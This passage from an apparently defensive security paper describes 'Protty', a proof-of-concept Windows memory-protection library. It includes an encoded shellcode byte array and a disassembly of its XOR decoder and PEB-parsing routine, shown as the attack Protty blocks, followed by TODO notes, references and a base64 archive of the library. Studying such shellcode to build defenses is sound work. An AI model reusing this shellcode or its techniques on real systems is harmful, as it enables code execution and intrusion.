+"\xc8\x71\x55\x65\xff\xee\x47\x49\xac\x75\x55\x63\xc8\xac\x4f\xd3"
+"\x16\xc8\xa2\xb7\xc2\x4f\xa8\x4a\x47\x4d\x73\xbc\x62\x88\xfd\x4a"
+"\x41\x76\xf9\xe6\xc4\x76\xe9\xe6\xd4\x76\x55\x65\xf1\x4d\xbb\xe9"
+"\xf1\x76\x23\x54\x02\x4d\x0e\xaf\xe7\xe2\xfd\x4a\x41\x4f\xba\xe4"
+"\xc2\xda\x7a\xdd\x33\x88\x84\x5c\xc0\xda\x7c\xe6\xc2\xda\x7a\xdd"
+"\x72\x6c\x2c\xfc\xc0\xda\x7c\xe5\xc3\x71\xff\x4a\x47\xb6\xc2\x52"
+"\xee\xe3\xd3\xe2\x68\xf3\xff\x4a\x47\x43\xc0\xd1\xf1\x4d\xc9\xd8"
+"\x1e\xc0\xc0\xe5\xce\x0c\x66\x3c\x70\x4f\xee\x3c\x75\x14\x6a\x46"
+"\x3d\xdb\xe8\x98\x69\x67\x86\x26\x1a\x5f\x92\x1e\x3c\x8e\xc2\xc7"
+"\x69\x96\xbc\x4a\xe2\x61\x55\x63\xcc\x72\xf8\xe4\xc6\x74\xc0\xb4"
+"\xc6\x74\xff\xe4\x68\xf5\xc2\x18\x4e\x20\x64\xe6\x68\xf3\xc0\x4a"
+"\x68\x12\x55\x65\x1c\x72\x56\x36\x53\x41\x55\x63\xc5\xda\x7a\xdd"
+"\x67\xaf\xae\xea\xc4\xda\x7c\x4a\x47\x25\xaa\xb5";
+
+
+Disassembly:
+
+0012FD68   90               NOP
+0012FD69   90               NOP
+0012FD6A   90               NOP
+0012FD6B   90               NOP
+0012FD6C   90               NOP
+0012FD6D   90               NOP
+0012FD6E   90               NOP
+0012FD6F   90               NOP
+0012FD70   90               NOP
+0012FD71   90               NOP
+0012FD72   90               NOP
+0012FD73   31C9             XOR ECX,ECX
+0012FD75   83E9 AF          SUB ECX,-51
+0012FD78   D9EE             FLDZ
+0012FD7A   D97424 F4        FSTENV (28-BYTE) PTR SS:[ESP-C]
+0012FD7E   5B               POP EBX
+0012FD7F   8173 13 9725AAB5 XOR DWORD PTR DS:[EBX+13],B5AA2597
+0012FD86   83EB FC          SUB EBX,-4
+0012FD89  ^E2 F4            LOOPD SHORT 0012FD7F	; DECODING LOOP
+
+decoded data:
+
+0012FD8B   FC               CLD
+0012FD8C   6A EB            PUSH -15
+0012FD8E   4F               DEC EDI
+0012FD8F   E8 F9FFFFFF      CALL 0012FD8D		; [!]
+0012FD94   60               PUSHAD
+0012FD95   8B6C24 24        MOV EBP,DWORD PTR SS:[ESP+24]
+0012FD99   8B45 3C          MOV EAX,DWORD PTR SS:[EBP+3C]
+0012FD9C   8B7C05 78        MOV EDI,DWORD PTR SS:[EBP+EAX+78]
+0012FDA0   01EF             ADD EDI,EBP
+0012FDA2   8B4F 18          MOV ECX,DWORD PTR DS:[EDI+18]
+0012FDA5   8B5F 20          MOV EBX,DWORD PTR DS:[EDI+20]
+0012FDA8   01EB             ADD EBX,EBP
+
+...
+
+[!] 0012FD8F (calls) -> 0012FD8D (jumps) -> 0012FDDE
+
+(PARSING PEB BLOCK ROUTINE)
+0012FDDE   31C0             XOR EAX,EAX
+0012FDE0   64:8B40 30       MOV EAX,DWORD PTR FS:[EAX+30]
+0012FDE4   8B40 0C          MOV EAX,DWORD PTR DS:[EAX+C]
+0012FDE7   8B70 1C          MOV ESI,DWORD PTR DS:[EAX+1C] ; [!!-P1]
+0012FDEA   AD               LODS DWORD PTR DS:[ESI]	  ; [!!-P2]
+
+
+
+[!!-P1] - protty (P1) takeovers the program execution when instruction
+          at 0012FDE7h (MOV ESI,DWORD PTR DS:[EAX+1C]) is being
+          executed, application is terminated, attack failed.
+
+[!!-P2] - P2 works like above, but the execution is redirected when lodsd
+	  instruction is executed.
+
+
+
+
+--[ VII.  Bad points (what you should know) - TODO
+
+I have tested Protty2 (P2) with: 
+
+- Microsoft Internet Explorer
+- Mozilla Firefox 
+- Nullsoft Winamp
+- Mozilla Thunderbird
+- Winrar
+- Putty 
+- Windows Explorer
+
+and few others applications, it worked fine with 2-5 module protected 
+(the standard is 2 modules NTDLL.DLL and KERNEL32.DLL), with not much 
+bigger CPU usage!  You can define the number of protected modules etc. 
+etc. to make it suitable for your machine/software. The GOOD point is
+that protected memory region is not requested all the time, generally
+only on loading new modules (so it don't eat CPU a lot).
+
+However there probably are applications which will not be working stable
+with protty. I think decreasion of protection methods can make the 
+mechanism more stable however it will also decrease the security level. 
+
+Anyway it seems to be more stable than XP SP2 :)) I'm preparing for 
+exams so I don't really have much time to spend it on Protty, so while 
+working with it remember this is a kind of POC code.
+
+
+TODO:
+
+!!! DEFINETLY IMPORTANT !!! 
+
+- add SEH all chain checker 
+
+- code optimization, less code, more *speeeeeed *
+
+- add vectored exception handling checker
+
+- add some registry keys/loaders to inject it automatically to 
+  started application
+
+(if anybody want to play with Protty1):
+
+- add some align calculation procedure for VirtualProtect, to describe 
+  region size more deeply.
+
+  Anyway I made SAFE_MEMORY_MODE (new!), here is the description:
+
+  When protty reaches the point where it checks the memory region
+  which caused exception, it checks if it's protected.
+
+  Due to missing of align procedure for (VirtualProtect), Protty region 
+  comparing procedure can be not stable (well rare cases :)) - and
+  to prevent such cases i made SAFE_MEMORY_MODE.
+
+  In this case Protty doesn't check if memory which caused exception
+  is laying somewhere inside protected region table. Instead of this
+  Protty gets actual protection of this memory address (Im using
+  VirtualProtect - not the VirtualQuery because it fails on special
+  areas). Then it checks that actual protection is set to 
+  PAGE_NOACCESS if so, Protty deprotects all protected regions and
+  checks the protection again, if it was changed it means that 
+  requested memory lays somewhere inside of protected regions.
+  The rest of mechanism is the same (i think it is even more
+  better then align procedure, anyway it seems to work well)
+
+  (you can turn on safe mode via editing the prot/conf.inc and rebuilding
+  the library)
+
+
+--[ VIII. Last words
+
+In the end I would like to say there is a lot to do (this is a concept),
+but I had a nice time coding this little thingie. It is based on pretty 
+new ideas, new technology, new stuffs. This description is short and not 
+well documented, like I said better test it yourself and see the effect. 
+Sorry for my bad english and all the *lang* things. If you got any 
+comments or sth drop me an email.
+
+Few thanks fliez to (random order):
+-  K.S.Satish, Artur Byszko, Cezary Piekarski, T, Bart Siedlecki, mcb
+
+
+"some birds werent meant to be caged, their feathers are just too bright." 
+                                    - Stephen King, Shawshank Redemption
+
+
+--[ IX. References
+
+[1] - VirtualQuery API
+    - msdn.microsoft.com/library/ en-us/memory/base/virtualquery.asp
+
+[2] - MEMORY_BASIC_INFORMATION structure
+    - msdn.microsoft.com/library/en-us/ memory/base/memory_basic_
+      information_str.asp
+
+[3] - IsBadWritePtr API
+    - msdn.microsoft.com/library/ en-us/memory/base/isbadwriteptr.asp
+
+[4] - Detours library
+    - research.microsoft.com/sn/detours/ 
+
+[5] - Bypassing 3rd Party Windows Buffer Overflow Protection
+    - http://www.phrack.org/phrack/62/p62-0x05_Bypassing_Win_
+      BufferOverflow_Protection.txt
+
+[6] - Defeating w2k3 stack protection
+      http://www.ngssoftware.com/papers/defeating-w2k3-stack-protection.
+      pdf
+
+[7] - Gaining important datas from PEB under NT boxes
+      http://vx.netlux.org/29a/29a-6/29a-6.224
+
+[8] - IA32 Manuals
+    - http://developer.intel.com/design/Pentium4/documentation.htm
+
+[9] - An In-Depth Look into the Win32 Portable Executable File Format 
+      (PART2)
+    - http://msdn.microsoft.com/msdnmag/issues/02/03/PE2/default.aspx
+
+[10]- Windows Heap Overflows
+    - http://opensores.thebunker.net/pub/mirrors/blackhat/presentations/
+      win-usa-04/bh-win-04-litchfield/bh-win-04-litchfield.pdf
+
+[11]- Technological Step Into Win32 Shellcodes
+    - http://www.astalavista.com//data/w32shellcodes.txt
+
+[12]- EPO: Entry-Point Obscuring
+    - http://vx.netlux.org/29a/29a-4/29a-4.223
+
+
+--[ X.  Code
+
+Library binary and source code attached to paper. Also stored on 
+http://pb.specialised.info .
+
+
+--- START OF BASE64 CHUNK - PROTTY LIBRARY PACKAGE ---------------
+
+<++> PROTT-PACKAGE.ZIP.BASE64
+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
+30XIQzB2/CPToqbPiI6JfSxu5txFmTkF+tVr1v7+idKyJ9c9/ewLr76x/2DD
+ocN/+vORo8daP/jos39+29P9w81bt+/cdcD9PmRK6NRHw6bJkzOWqUlN4coi
+rU5vLLNUb9m2+82avW/te3t//ZH3Tp779B/M5a/t31y5+u2NOwi9xd/H3xW3
+O67GYy9sfm7fe5/zTAxifxeYVMVjrypaJfS03y89o3JIVNaJlTzoPctd0v+2
+rX+M9e1Xc4fQqkI/r4VbeAAeDcEZYBTwGQk+pQHu5SCG3jqvft1eLXgcQ4oA
+c8ncmBjnWztITQq62RQREi1mslM4AvpKZpFT3jvP5Cnw6GazFUBMpAMtHVQQ
+pBVxThV/6DJ3e00GuEyWCoW3pY0KhYI8sNMXkY6Z6DzZ6Zh5nHzBo+N9EjQP
+kLs3pzrIzanzQ0g0P2S3wkmkwyOvg1z5me4KudT33Fky/PLKIlJY9doe0rHu
+lTfIW9OqrpArz2n3ks9/+VYkmf3hjmWkJ3eCG7nhtcBZpL0lMI88v8rnAKmd
+vOkEqV1ZdpDcvVt7kPTa6nCQafMTT5Ew3QdkZ+zuzeTxOYe0ZNoeeQmpPfj8
+LvKAtmMV2bFK20E2X1ilJYlv1vmQPs13W8lW6JLHgtvvknXB7fNJcfrGOtIh
+rnNIT9RzpR0M/pHau8PouXT5ksVphcTSBae/ti2TNjI4E997qUtpc5wriYaD
+VyeDrmEqdB+CIwD6Xqw411bnZ2tA5VwEnAOclXJsdYStzgQDgfkdMAVCDj5D
+wVEIxyTQHwstvwGZ3Jw6tSYwwGUHBl6tzFb3GhY/CCNfJ3A9nKsl2NN1PJvg
+cM8o3BfA4Z7f4Im1OXyXKewRwcceEU6PnL7G2+oanf6V4wbUTNhFAxjfjlye
+N2HLfrZ5tlxpo/QMXSQMri7jFk7Ovt1ZA1fFVJoSCvNj+IKKJ2FV+eY4B7Wm
+ij+HDnq6y9ZjfNz7bKU8IFYgqHgFzsZ2CyoO4rZLUIF/UIk9KajAsehqkTkz
+QWsGv6olv/ySh8ceP4rHzUB7CGiMHMGBNmuy1xfu1WWBnbuqTlmTR+I+0bkr
+FCbfapVznb99SBvtnVVfTLxk+rLH2Ol9tsvmZxR22QjjuC6bySjossmM7pdz
+4VKtlI+yd1XKR9uvm4wcvt1uMiK+/R/gdaX8Pu/NT+NvPsw3HVTt5TwAd/Gn
+G7tMpzj267j3jekUYf+nKY4wXjKdcrN/yiqNUQinxxJZRi9TWYDD6CY4fHNU
+1ef5kzwaTbcbqWBTGeJSU2PdjN6mU54sfqzQw3RbRo023TZR/PzH3JGRZ2pz
+u3wX/ulMbRx7V/5jfER5Ycg1gBi/MrVx7Red/4I4/HQGv6vZRLlVyUfXdDV7
+Urzaa9DKsGAUdCBytQXQQuhq82uq5AE1gsOX/Erg7H01EGkMGwMdT9wZW1Nt
+DKSTvTp3VRsJOnkkRBRmsZZxraU4oI5Js2VQR02ax/IklitYns7yLODD9H+F
+0uclphHwh7/zIdLkCemJixb+1j4N069HwbL+fi70Z8uGxulAboJjIxzb4dgD
+R4Ps58/1ZdOqoiKE/DmQq+MCIV6lMuAiAc3iDCpn0AZOkl6pStKsMCgNayHH
+nM11Zukq7qDyEz0+qNYYpv8GSRTO7xl7j2AYT4VDBIcAUpzH2K/tiqGGpNay
+1RH7EUmO8wuS39TzYfrFBPuKP0nZK4oUzxEvFj8h3iDeLH5V/IbYV5IuKZDU
+S4Kkj0ibRD2iuyK+eJy4WLxQsk6yXfql9JZ0ZHhE+OvSG1IiPCe8I9we7h9x
+OPz98LERD0UII7ZH7InwjYyKzIvcENkQ+WWkX1RsFBlFRVmiHoksi3w98kzk
+3cgpUYujdFGbZ748s27msZnvzbwwE7EfnWJ/RKIsUY4oX6QV1YgOiJpFp0QX
+RF+JvhO5iSNFsSIf8ShxvDhHXCtuEH8rjpboJJHiVPEqcbn4afFxMV9CShol
+b0p6JEppkdQgXR/eJu2WzgwvCz8afiNcGJEdsSmiNeJORFikMnJX5CeRI6Ji
+oppmtM4IiZ4WnR63JC43Lj+uKM4Q99tuzDAN0/8+/QtQSwMEFAAAAAgAj4rB
+MvuuLWqWAAAA1AAAACgAAABQUk9UVC1QQUNLL3Byb3R0eS1jdXJyZW50L2Jp
+bi9SRUFETUUudHh0XU5RCsIwFPsv9A65gBW8gbgJwtQPHfgnXfdkD2Zb2jfm
+bu9wH4qBQCAhSUxBZDJt36Nhb9Ok1eofWmm1C8/IPbUYWbowCOpyj46GxFnY
+ZVj/tU7XoqrMTNArhiTI5ISDR5zHFmm0OjwwhQGj9QIJYO8S2Uzrlhbxk85I
+5JYDkI7Qc5PmqwbH7e1+PBd1VV60yvQp2pg3UEsDBAoAAAAAABZYwTIAAAAA
+AAAAAAAAAAAhAAAAUFJPVFQtUEFDSy9wcm90dHktY3VycmVudC9zb3VyY2Uv
+UEsDBBQAAAAIAFlheTJDRARvYgAAAI4AAAAsAAAAUFJPVFQtUEFDSy9wcm90
+dHktY3VycmVudC9zb3VyY2UvY29tcGlsZS5iYXRLSc1RKCjKLymp1EvJyeHl
+SkHw85OyeLlKEotzjY0U9HMNgdgYiCug0jo61kDZnMy8bKC0bkhBioJuYiJM
+DqYkM7cgv6jE2EgvJzNJB2ZNapoOL1eAa3hQsKuznrO/L5L9AFBLAwQUAAAA
+CAAuWnkyLwFFIKEFAAA3FAAALwAAAFBST1RULVBBQ0svcHJvdHR5LWN1cnJl
+bnQvc291cmNlL2RlYnVnX3Byb3QuaW5jrZdbj5tGFICfseT/MFJf2krZsN6b
+00RNMYx3aViggJ3dvCAM2EZibQJs4vTXdy4Ml5mxrUjFsmxxvnPm3OYwvAeu
+5wTBMzBt3VoYEMxNC4I3P3WNR+9/TuGYFeYL+vkb6gF4A+Iyjeo0AasfwM32
+dQlm0S6LwIcV/rko8K2/Ni9Rll/E+5c/sYltXRd/vH1brC6qIo2zKM+qNLnI
+duv9/+Um/hiz+1B37MC0F1DBF/xnoaiqeom+k20n9xwrnHlQ+8SYa8pMOUZX
+OOCmAeCTDt3AdOzQdoLwQbMNCxoNOqXoZYMG0Hs0bS2AYfCAljQ4i1cChtKs
+Q9/nuOstDlBHFjokNOBsgZxZQjto6KuWoatJkMl41Lk/FBP5JZabwYlFbhpC
+ugR1ejyyHCyyLJn4djxyFoG7CBqhH3imPVxjOh4t7FM27sYjz3S7e+TmO9oH
+/Qg1nUSxNB1LwzdYV8QquXBFO5g0heuYdgDaiylMqcLVQMHQAi14dmH4aPqa
+Zd7bj10ITGMy0PBRpBZEIUNX4cDrAah5nvYczpyFbfik4aDR9ljj/TQeaMwt
+nFDb8R41K3Rc6KG+5BQSUcFcmgYMZ8/hF+g5HJ4KuGnDJ00PQg/6Cyvg8LUE
+X6K0GNQbMf3vVEHDWUJvbjmfFY68FEg/0PRPof4A9U8cOxFYlES52WE5UeFP
+JuTdtYAf83fYWK5nLhGOGn2hS9JwO4Btx26mmDZDrdIKBjqTmxM6/a3cNh5J
+V8/dnrF1wsVFq2aYvuv4pujw5HZL95lvfoGhMw+n6tX0DjXFvYka2yPDK/36
+imYhxeotemIkYbzf1emhJtuVpGI8ig+hTu/O82hTEZHx2fEMBQBVUd43KmCN
+pfhJgqOET2xytCsSS0apKoKFJF29bkCZbrKqTkvwi9qgl+fRywadnEcnDXp1
+Hr1q0Nvz6G2D3p1H7/rJQRVGuw2NVDLL2iyX+/zzvkwEW+viFTSJJqxfR/Vr
+JaJEGESbIxJYlvvSWa+rtD4m9dM8jet9KYqNqI6O6mJhX5UTe00WNNRlRDx7
+DiCSHulOkLwW4Ff1N5qXUrWLA4445S13+fThPR7stMv8dHMvNuqmaovBqLlI
+rUUKilQqUoZIJX2q8xUVHN5Dj+Y8ycTOSZNsaB5WMqriqdVBQq0OHJXIqISn
+YhkV81Qko6KDNOzmzNa4WshcLTjzmYzKCiH3umQscRWC8umVkrHFZ1u2bCUu
+64v2qr4tagWi4wEesY/w0fHQeUHzTR31wByfAprB3Yzab1/DWVSlWpKUKTJE
+jzaKu3RMAyhqd+ABBNXyfB9HdbbfYSWe5hC33Ndoc2IIMJcZhTfnfudn/7ZG
+qJjJydZjoqFqZ1YiDH4UMrUTecCpAvSBJD1IY7pLV1wkWbidZ3m3Cj3ooz8q
+YHLkYtzLZo9okYA8/GQEQ/IC59hZmy/Rpl3NIrkegsl3A499E703YcfaeUl7
+ZIDuWlJIPb84ddBCtcx7tZatnxeoWmXNtVDPaMuRUOzo5WQ468Uui/dJy/Tt
+nKoQ6/nuxOJBnerS6qFHHjzEaYF7U0cL9DaSAkj1WjHZuJJIlPEolNlvkZ6N
+Jh/tBqFi+/VllZZuVKIsoA1bHdPGNSpfyD4a+iAPUAx+kBsxAV4as+e1aO+D
+it7Pk+/zrKxqfRvt4kGuqKNHFmKOcG9pvB95wvZRbw+RrUokrPeNPO/apBOf
+7PgOG3a7IgK9jpQtwzpRadtQPRoYi3uB3iroYEEX+ctm8vHeJelWuFr0zfcA
+6fJEPliZucO9I7MxlqQsh/BbuqvZbmgKrDZAM8bM/rGuFdL5IJMtmuCZPx9F
+N5h77sJ/0ELaFKBzMAAs3BAaJhhetIYfGwIgxD+NIGLmniP8s8Ts6RxhnCX0
+s4R2lBBzRbPYvx/iwy0WofcscP37FOf4P1BLAwQUAAAACAC9c4kye3r6p/wB
+AABdBAAAKwAAAFBST1RULVBBQ0svcHJvdHR5LWN1cnJlbnQvc291cmNlL215
+X2RsbC5pbmONVFFvmzAQfkfiP1h52lQWRZk2VWyaSLpqjdQ2VZq3KEIHvhA2
+g5HtNGy/fmdDcLZs2lDAcPfd3Xf32Rm/u37fhMG4khwF2wkwYRAGZZ2LA0d2
+LOu3U2jKMRmsPclBiJZVkCvJ2jDA1qCqWRs3ShLAep255pWFNxr3jK4Oz9hx
+D2bKZRiw/hKSQmhNEvmCKiV4uoeaC1Qe45L+A1PJF7eibqINPa4m1/utdw91
+L3PEHtVK1SXhbUS3dzQH7drgR6k4a4xiOx1vCLK9ZHCJiYiPx51G84GtUBup
+kD3f3rE3w5cU3FmGFsNAnU/xf+jK5i9ULjG/BJ64OaVt0/qHl7qTCnqRaeUZ
+a6NJGEDsBXeRHLNDMT1FRqUzCQNThQXDjIbhBlr6IqNX+Wv2VEqiOoe6BPYx
+s8u4saakqKAU41xWn0Y+pO2zTHpCvtkNlbhKH1BrKHAu29nW80vyPebfTtxQ
+qTSnfR9VujhvsGoYAg21d4fB1xqtY+hMFxF7mKeLm+Xj7Wq1XBHCxrSl+X0c
+SYEmpQOUAueqL1tFcDbf4VDdS+D3ZaZAfZ95P/R9EqEB+QXNE523GaWkLs+6
+82PuKtHbH4SD2MnvnKS6PmT2PZK7nUZjAedq0l8DB9PJPVrfLZ4Z/T7P1jPa
+pTfrxfJxZPcAobpJcSFIrTruQn8CUEsDBAoAAAAAAJ2MwTIAAAAAAAAAAAAA
+AAAmAAAAUFJPVFQtUEFDSy9wcm90dHktY3VycmVudC9zb3VyY2UvcHJvdC9Q
+SwMEFAAAAAgAMUpPLJnanyiBAgAAbAoAAC8AAABQUk9UVC1QQUNLL3Byb3R0
+eS1jdXJyZW50L3NvdXJjZS9wcm90L0FERTMyLkFTSKWVXW+iQBSG7038D+cS
+41phSlqyrttQwaapLob2ontl0BlbGr6WD0Ob3f++DAgygBJ1bkZh3oc577wH
+up0RyIp6jWCLrnjU7XQ7k6Wq65oO1UH+ROk8ENjrIxiPTWdrWCYG11u7mFCG
+rCi6cJDBZ0N4Lxh/cxFqE6GSyDY+YUUgCgiGwLQjKzQc4kaB9ZnjxDacWNnD
+TJs81TRVkbQXvRtbAqnI88nGjCnj5rZOqDIEfs/AZGNg7H8HBD8Gg58gppCb
+dghiIdgIDRaiq4tWiMhXqklE8a4a4KZoOL3uUdaz+tDKkqosKtobI//6vdDV
+6eNrI4KjRfepff3sHPppAf300ekWFPlFbkmVwPOVE6WillQhRnQ8VRTXkiqx
+tofnx/s276SyiK5PbAuIE+ZJroeqLE/KLslpmgLzi0B/nIcr33o9VmUMYjA0
+TyUM/Usxc03R50eLERlMsj6OY304p+J7WWlxQmLEkRMFkWHBxvVhoYL6qg6V
+2YyStMVEU9TqyZZI1JNqHpGTv6WA46fgol7WJrPjm0INKJ9YRmgmPwz/LbKT
